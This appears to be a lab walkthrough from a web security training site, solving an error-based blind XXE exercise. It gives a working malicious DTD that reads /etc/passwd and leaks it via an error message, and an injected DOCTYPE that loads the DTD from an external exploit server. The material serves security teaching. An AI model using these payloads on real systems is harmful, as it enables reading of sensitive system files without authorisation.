Click "Go to exploit server" and save the following malicious DTD file on your server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
When imported, this page will read the contents of /etc/passwd into the file entity, and then try to use that entity in a file path.
Click "View exploit" and take a note of the URL for your malicious DTD.
You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Insert the following external entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
You should see an error message containing the contents of the /etc/passwd file.
Community solutions
Garr_7
Michael Sommer (no audio)
Want to track your progress and have a more personalized learning experience? (It's free!)